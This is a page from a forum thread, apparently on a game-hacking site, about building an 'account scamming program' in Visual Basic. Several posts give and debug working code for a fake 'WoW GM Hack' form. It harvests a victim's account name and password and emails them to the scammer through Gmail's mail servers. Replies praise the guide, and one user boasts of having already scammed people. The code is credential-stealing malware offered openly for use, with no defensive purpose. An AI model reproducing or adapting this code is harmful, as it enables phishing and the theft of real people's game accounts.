[VB 2008] How to make a Account Scamming Program for Noobs menu

Shout-Out

User Tag List

Page 3 of 5 FirstFirst 12345 LastLast
Results 31 to 45 of 74
  1. #31
    Apoc's Avatar Angry Penguin
    Reputation
    1388
    Join Date
    Jan 2008
    Posts
    2,750
    Thanks G/R
    0/13
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Michael Jackson View Post
    Very nice guide, JetLagDad, +Rep for that!
    But still, im having a problem with the body thingy.

    mail.Body = ""Account:" & TextBox1.Text & vbNewLine & " Password: " & TextBox2.Text "


    Is it that way i have to set it? because it comes errors there...

    And another thing is when i press Build, i still cant seem to find it-.-
    mail.Body = "Account:" & TextBox1.Text & vbNewLine & " Password: " & TextBox2.Text

    Try that.

    [VB 2008] How to make a Account Scamming Program for Noobs
  2. #32
    yunlek's Avatar Member
    Reputation
    9
    Join Date
    Dec 2008
    Posts
    75
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    awsome i was looking for a guide like this

  3. #33
    _DecpticoN_'s Avatar Member
    Reputation
    34
    Join Date
    May 2008
    Posts
    234
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    your code will display error messages if the boxes aren't filled in but it still sends the email >_<

  4. #34
    Cephalopod's Avatar Member
    Reputation
    5
    Join Date
    Sep 2008
    Posts
    85
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by _DecpticoN_ View Post
    your code will display error messages if the boxes aren't filled in but it still sends the email >_<

    Code:
    Imports System.Web
    Imports System.IO
    Imports System.Net.Mail
    
    Public Class Form1
        Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
            If TextBox1.Text = "" Then
                    MsgBox("The account field is not filled in!", MsgBoxStyle.OkOnly, "WoW GM Hack")
                    Exit Sub
            End If
    
            If TextBox2.Text = "" Then
                    MsgBox("The password field is not filled in!", MsgBoxStyle.OkOnly, "WoW GM Hack")
                    Exit Sub
            End If
    
            Dim mail As New System.Net.Mail.MailMessage()
            Dim SmtpServer As New SmtpClient
            SmtpServer.Credentials = New Net.NetworkCredential("Blank", "Blank")
            SmtpServer.Port = 587
            SmtpServer.Host = "smtp.gmail.com"
            SmtpServer.EnableSsl = True
            mail.To.Add("Blank")
            mail.From = New MailAddress("Blank")
            mail.Subject = "Blank"
            mail.Body = "Blank"
            SmtpServer.Send(mail)
        End Sub
    End Class
    Red and bolded for emphasis.

  5. #35
    magesr1337's Avatar Member
    Reputation
    12
    Join Date
    Dec 2007
    Posts
    162
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thanks man, epic post. Can make personalized ones now

  6. #36
    weebo's Avatar Member
    Reputation
    11
    Join Date
    Aug 2007
    Posts
    13
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Gr8 guide i helped me alot.. +rep

  7. #37
    maclone's Avatar / Authenticator enabled
    Reputation
    2420
    Join Date
    Nov 2007
    Posts
    8,726
    Thanks G/R
    0/1029
    Trade Feedback
    0 (0%)
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Midol View Post
    Code:
    Imports System.Web
    Imports System.IO
    Imports System.Net.Mail
    
    Public Class Form1
        Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
            If TextBox1.Text = "" Then
                    MsgBox("The account field is not filled in!", MsgBoxStyle.OkOnly, "WoW GM Hack")
                    Exit Sub
            End If
    
            If TextBox2.Text = "" Then
                    MsgBox("The password field is not filled in!", MsgBoxStyle.OkOnly, "WoW GM Hack")
                    Exit Sub
            End If
    
            Dim mail As New System.Net.Mail.MailMessage()
            Dim SmtpServer As New SmtpClient
            SmtpServer.Credentials = New Net.NetworkCredential("Blank", "Blank")
            SmtpServer.Port = 587
            SmtpServer.Host = "smtp.gmail.com"
            SmtpServer.EnableSsl = True
            mail.To.Add("Blank")
            mail.From = New MailAddress("Blank")
            mail.Subject = "Blank"
            mail.Body = "Blank"
            SmtpServer.Send(mail)
        End Sub
    End Class
    Red and bolded for emphasis.
    "Return" works too.
    Zomfg. And no, don't ask. - Dombo did it.

  8. #38
    ReidE96's Avatar Archer Authenticator enabled
    Reputation
    470
    Join Date
    Dec 2006
    Posts
    1,625
    Thanks G/R
    1/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Exit Sub is better coding practise, though. Save Return for Functions.

  9. #39
    Cephalopod's Avatar Member
    Reputation
    5
    Join Date
    Sep 2008
    Posts
    85
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Code:
    Imports System.Web
    Imports System.IO
    Imports System.Net.Mail
    
    Public Class Form1
        Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
            If TextBox1.Text = "" Then
                    MsgBox("The account field is not filled in!", MsgBoxStyle.OkOnly, "WoW GM Hack")
                    Exit Sub
            End If
    
            If TextBox2.Text = "" Then
                    MsgBox("The password field is not filled in!", MsgBoxStyle.OkOnly, "WoW GM Hack")
                    Exit Sub
            End If
    
            Dim mContent As New System.Net.Mail.MailMessage()
            Dim smtp As New SmtpClient("aspmx5.googlemail.com")
            mContent.To.Add("gmailaddressyouowninhere")
            mContent.From = New MailAddress("[email protected]")
            mContent.Subject = "Scammed Account Details"
            mContent.Body = "Account: " & TextBox1.Text & vbNewLine & "Password: " & TextBox2.Text 
            smtp.Send(mContent)
        End Sub
    End Class
    Better option than the original code which was presented. This contains no password. Not entirely sure why I am helping scammers.

  10. #40
    DarkGuardDK's Avatar Member
    Reputation
    1
    Join Date
    Jul 2007
    Posts
    9
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Great tutorial, already scammed some people, but i can't keep the accounts because i don't know how to when you only get to know their account name and password (ofc you can add more :P) A great thing to add would be a combo box which the victim have to tell if it's a Eu or US account. I'll rep if i can, but i don't think i can since i'm a leacher (greatest status ever!)

  11. #41
    Henessy's Avatar Contributor
    Reputation
    104
    Join Date
    Sep 2008
    Posts
    1,284
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thanks, JetLagJed! I have some trouble though, so would you mind helping me?

  12. #42
    Jadd's Avatar 🐸 Premium Seller
    Reputation
    1515
    Join Date
    May 2008
    Posts
    2,433
    Thanks G/R
    81/336
    Trade Feedback
    1 (100%)
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by jess~ View Post
    Thanks, JetLagJed! I have some trouble though, so would you mind helping me?
    It's JetlagJad.

    And what troubles are you having?

  13. #43
    Black Gull's Avatar Contributor
    Reputation
    153
    Join Date
    Jun 2007
    Posts
    278
    Thanks G/R
    1/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Works like a charm, just not sure if I'm gonna use it to get acc :P

  14. #44
    dickundhaesslich's Avatar Member
    Reputation
    1
    Join Date
    Mar 2009
    Posts
    11
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    hahaaa lol.... ive used reflector on some youtube programs... aaand... ive taken UR gmail account to mine dude xD sry@Jat

  15. #45
    steffmaister's Avatar Member
    Reputation
    1
    Join Date
    Mar 2009
    Posts
    1
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    im having some kind of a SMTp problem. can someone help me plz

Page 3 of 5 FirstFirst 12345 LastLast
All times are GMT -5. The time now is 07:23 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search